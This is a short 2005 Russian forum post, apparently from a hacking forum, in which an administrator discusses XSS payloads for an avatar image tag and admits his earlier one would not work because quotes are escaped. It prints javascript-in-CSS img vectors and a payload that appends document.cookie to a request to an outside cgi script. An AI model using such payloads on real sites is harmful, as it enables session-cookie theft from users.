15.01.2005, 20:14
|
|
Администратор
Регистрация: 05.10.2003
Сообщений: 1,083
Провел на форуме:
4618051
Репутация:
45
|
|
Как бы Егор меня не путал, по идее оба скрипта синтаксически верны:
Код:
<img src="http://abc.ru/x.gif"style=background-image:url(javascript:alert('1')) alt="" border="0">
<img src=`http://abc.ru/x.gif`style=background-image:url(javascript:alert('2')) alt="" border="0">
И вот в чем была моя ошибка и чего я не учел:
Аватара отображается как
Код:
<img src="http:/site/1.jpg" alt="" border="0" />
И само собой разумеется, что я предложил синтаксически неверно (в нашем случае):
Код:
http://www.smailiki.nm.ru/lam/lam4.gif` bb=`http://antichat.ru/cgi-bin/s.jpg?` style=`background:url(javascript:document.images[0].src=this.bb+document.cookie)
Все это преобразуется в <img src=" http://www.smailiki.nm.ru/lam/lam4.gif` .... ... что является галиматьей полной и естесственно не сработает ...
Получается - раз кавычки преобразуются в " , то за пределы <img src="... никуда не выйти ...
Извиняюсь за свою ошибку - просто я не вчитался в тему ...
Последний раз редактировалось Че Гевара; 15.01.2005 в 20:18..
|
|
|